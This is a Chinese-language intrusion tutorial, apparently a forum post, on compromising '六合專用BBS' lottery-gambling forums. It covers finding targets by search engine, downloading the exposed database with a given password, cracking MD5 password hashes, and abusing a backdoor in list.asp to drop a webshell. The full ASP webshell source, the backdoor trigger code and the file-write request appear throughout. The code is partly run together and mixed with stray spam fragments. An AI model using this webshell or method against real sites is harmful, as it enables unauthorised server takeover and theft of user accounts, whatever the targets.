先在 baidu 搜 “六合專用BBS v1.0”當然你搜 v2.0 、v3.0 都可以!“找到相關網頁約23,000篇,用時0.017秒”我們看一下非常多的,隨便進一個吧。 找到Domain2.2.exe,的 SearchPage.txt,在裡面加查找頁 /fdnews.asp /bbs/fdnews.asp,好了現在我們來掃掃看!哇,好多啊,這個就是數據庫了,我們用網際快車 把他下下來,5自學網,昏 ,打開要密碼,就密碼這個東西啦: newbbs.cn88 ,現在 帳號、密碼,就盡收眼底了,嘿嘿!~~現在把 md5 加密的東西放 MD5Crack 2.3 去跑吧,看你運氣咯!~不過我們今天要的不是它的密碼,而是webshell。大家跟我來,馬上會有驚人的發現。打開數據庫的zl表,找到idto 的字段,怎麼了發現什麼了嗎?這個好象是一個網頁哦,嘿嘿!~~代碼如下:<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title></title><meta content="Microsoft FrontPage 3.0"></head><body bgcolor="#FFFFFF"><%Function GetPPdim ss=Request.ServerVariables("path_translated")GetPP=left(s,instrrev(s,"\",len(s)))End functionMODE=Request("MODE") sPP=Request("PP")if sPP="" then sPP=GetPPif right(sPP,1)<>"\" then sPP=sPP&"\"Response.Write "<b>Index of "&sPP& "</b>"
%><%fname=request("fname")if fname<>"" thenSet objFSO = Server.CreateObject("Scripting.FileSystemObject")if request("save")="" thenSet objCountFile = objFSO.OpenTextFile(fname,1,True)If Not objCountFile.AtEndOfStream Then fdata = objCountFile.ReadAllelsefdata=request("fdata")Set objCountFile=objFSO.CreateTextFile(fname,True)objCountFile.Write fdataend ifobjCountFile.CloseSet objCountFile=NothingSet objFSO = Nothingend if%><form method=POST><table border=0 cellspacing=0 bgcolor=#000000><tr><td><table border=0 cellpadding=10 cellspacing=0 bgcolor=#FFFFFF><tr><td><table bordercolor=#0080FF bgcolor=#FFFFD0 border=1><tr><td bgcolor="#0080FF"><font color="#FFFFFF">change:<%=fname%></font></td><tr><td><input type="submit" value="ok"><input type="reset" value="reset"><br><textarea rows="22" cols="100"><%=fdata%></textarea></td></tr></table></td></tr></table></td></tr></table></form></body></html>再認真看看,其實這就是一個webshell,所有的六合彩專用論壇的數據庫裡面都有。它出生的時間可能比海洋頂端2003 還要早,是asp木馬界的鼻祖了。既然數據庫的文件名是asp的後綴,而裡面又自帶一個asp木馬,我們來試試直接打開這個數據庫地址,昏,可以看出木馬裡面的asp 代碼並沒有執行,也就是說我們拿了一只死馬。這就是我12月25號的號的發現,拿到這個之後就和兄弟 ☆罹天燼☆ 討論過(czy也給予了幫助),開始認為只要拿到網站在服務器上的絕對路徑就可以在本地提交,寫入我們自己的木馬,但是實驗卻一直沒有成功。雖然我手裡有一個這樣的論壇,但是有幾個重要的頁面丟失了,一時也看不出一個所以然來,這樣一拖就是十幾天,前天我再把這個論壇的代碼拿出來看,在list.asp 裡面發現一段重要的東西.<%if len(page)>6 thenif md5(md5(page))="8f9fc56c3d174202" thendim fname fname=""&sPP&"pags.asp"Set objFSO = Server.CreateObject("Scripting.FileSystemObject")Set objCountFile=objFSO.CreateTextFile(fname,True)objCountFile.Write ""& idto &""objCountFile.CloseSet objCountFile=NothingSet objFSO = Nothingresponse.write "SORRY <br>"response.write "ID?????"response.endend if%>注意到了嗎?""& idto &"" 這裡的idto 不就是數據庫裡面放asp木馬的字段嗎?嘿嘿,那麼上面的pags.asp,就應該是寫入的文件名咯?我們來試試看,到底是不是這樣的!提交:看到沒有這個古老的asp木馬終於顯身了,首先它可以看到網站在服務器上的絕對路徑,第二還可以寫入文件。有人看到這個木馬很郁悶,因為它根本沒有寫入文件的路徑的設置表單,是不是我們提交的數據庫,都進了數據庫了呢?來看看原代碼,這一句 Set objCountFile = objFSO.OpenTextFile(fname,1,True)看這裡是寫入了文件fname, 而不是數據庫,我們先要請求文件fname 寫入的路徑,在ie 提交:?fname=D:\ky8888\bbs\haotian.asp再填內容 ,嘿嘿· ok 了 !,這樣D:\ky8888\bbs\haotian.asp 就是我們新建的文件了。
因為這個網站空間不支持fso,所以我直接把數據庫裡面的木馬復制到朋友的asp空間去演示,看是不是寫入文件成功了,嘿嘿!~~?id=1 這樣簡單就拿到了webshell,不過我試了另外幾個六合彩網站卻沒有發現這個pags.asp,看來這個裡面還有東西要挖一挖。可能要等到拿了完整的 六合專用BBS 的代碼之後問題就都解決了。本文只是起到拋磚引玉的作用,自學教程,還是那句話期望著大家一起走到打擊六合彩網站的道路上來!消減它們,國家的害蟲……我在寫本文的同時,也有很多人和我說,現在地下足彩也很泛濫,所以我專門聯系了一位國內的黑足彩高手,他將在近期出一篇關於消減足彩網站的文章。
